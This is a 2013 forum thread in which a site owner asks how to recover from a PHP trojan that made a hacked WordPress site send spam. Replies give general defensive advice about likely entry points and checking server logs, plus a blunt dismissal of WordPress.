Jump to content


Photo

Security help Trojan.PHP-43


  • Please log in to reply
2 replies to this topic

#1 Johnnyboy69

Johnnyboy69

    Newbie

  • Members
  • Pip
  • 8 posts

Posted 05 February 2013 - 02:18 AM

Hi all. Was hoping for some advise on the following. A client has provided me with a website that has recently been hacked. Apparently, specifically the mail server aspect of the site has been influenced, causing the site to send out spam mail. The following Trojan was found in 4 files of the site: Trojan.PHP-43. Files that were influenced were mostly wp-conf.php and 2 mail php scripts. Does anyone have knowledge or experience with this Trojan or any tips that could help me resolve this? Also any pointers on aspects of the site that will need to be improved in order to prevent this I.E what weaknesses of a site is normally exploited for this kind of Trojan to breach it? Thank you in advance

#2 PFMaBiSmAd

PFMaBiSmAd

    Advanced Member

  • Staff Alumni
  • 16,767 posts
  • LocationColorado, U.S.A.

Posted 05 February 2013 - 06:14 AM

The issue isn't directly with the Trojan script itself, it's how the Trojan script was placed onto the server.

Some php code was either uploaded, remotely included, or injected into eval'ed content and then executed on the server or an admin password for an application/control panel/ftp was guessed and directly allowed php code to be put onto the server. The original loader script then read and put the Trojan script onto the server. You would need to find the exact method that was used to get the original loader code onto the server and close the hole that allowed it. The web server access log file and any application/control panel/ftp/sql query log files would be the best places to start looking.

Given the name of the Trojan, it's likely that the method of getting it onto the server involved a remotely included file in conjunction with php's register_globals being ON and an older php application that wasn't secure.

Edited by PFMaBiSmAd, 05 February 2013 - 06:18 AM.

Signature: (not a comment about anything you posted unless specifically indicated)
Debugging step #1: To get past the garbage-out equals garbage-in stage in your code, you must check that the inputs to your code are what you expect.

Programming is just problem solving, but it is done in another language. You must learn enough of the programming language you are using to be able to read and write code.

#3 KevinM1

KevinM1

    Snarkimus Prime

  • Moderators
  • 5,217 posts
  • LocationNew Hampshire, USA

Posted 05 February 2013 - 07:56 AM

Files that were influenced were mostly wp-conf.php and 2 mail php scripts. Does anyone have knowledge or experience with this Trojan or any tips that could help me resolve this? Also any pointers on aspects of the site that will need to be improved in order to prevent this I.E what weaknesses of a site is normally exploited for this kind of Trojan to breach it? Thank you in advance


Don't use WordPress. It's notoriously bad with security, especially if it's not up-to-date and if you're relying on plugins to do most of the heavy lifting.




0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users

Cheap Linux VPS from $5
SSD Storage, 30 day Guarantee
1 TB of BW, 100% Network Uptime

AlphaBit.com